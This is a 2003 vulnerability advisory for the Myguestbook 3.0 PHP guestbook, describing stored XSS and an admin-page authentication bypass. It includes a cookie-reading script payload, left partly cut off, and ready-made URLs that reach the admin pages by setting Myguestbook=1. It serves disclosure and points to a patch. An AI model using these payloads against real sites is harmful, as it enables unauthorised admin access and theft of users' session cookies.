22th Feb 2003 [SBWID-6011]
COMMAND
Myguestbook (PHP) XSS and admin page access
SYSTEMS AFFECTED
Myguestbook version : 3.0
PROBLEM
Frog Man [[email protected]] found :
http://www.frog-man.org/tutos/Myguestbook.txt
PHP Code/Location :
°°°°°°°°°°°°°°°°°°?
If pseudo = [SCRIPT],
e-mail = >[SCRIPT]
or message = </textarea>[SCRIPT]
[SCRIPT] will be executed on index.php, /admin/user_modif.php,
/admin/admin_modif.php and /admin/admin_suppr.php .
/admin/confirm_connect.php :
---------------------------------------------
SetCookie("Myguestbook","$name:$password");
---------------------------------------------
/admin/admin_pass.php, /admin/admin_index.php, /admin/admin_modif.php and
/admin/admin_suppr.php :
--------------------------------------------------------------------
<?
if(!isset($Myguestbook))
header("location:../index.php?MSG=permis");
?>
--------------------------------------------------------------------
Exploits :
°°°°°°°°°°
[SCRIPT] :
<script>
+document.cookie;
</script>
http://[target]/admin/admin_index.php?Myguestbook=1
http://[target]/admin/admin_pass.php?Myguestbook=1
http://[target]/admin/admin_modif.php?Myguestbook=1
http://[target]/admin/admin_suppr.php?Myguestbook=1
http://[target]/admin/user_modif.php?id=[MESSAGEID]
SOLUTION
A patch can be found on http://www.phpsecure.org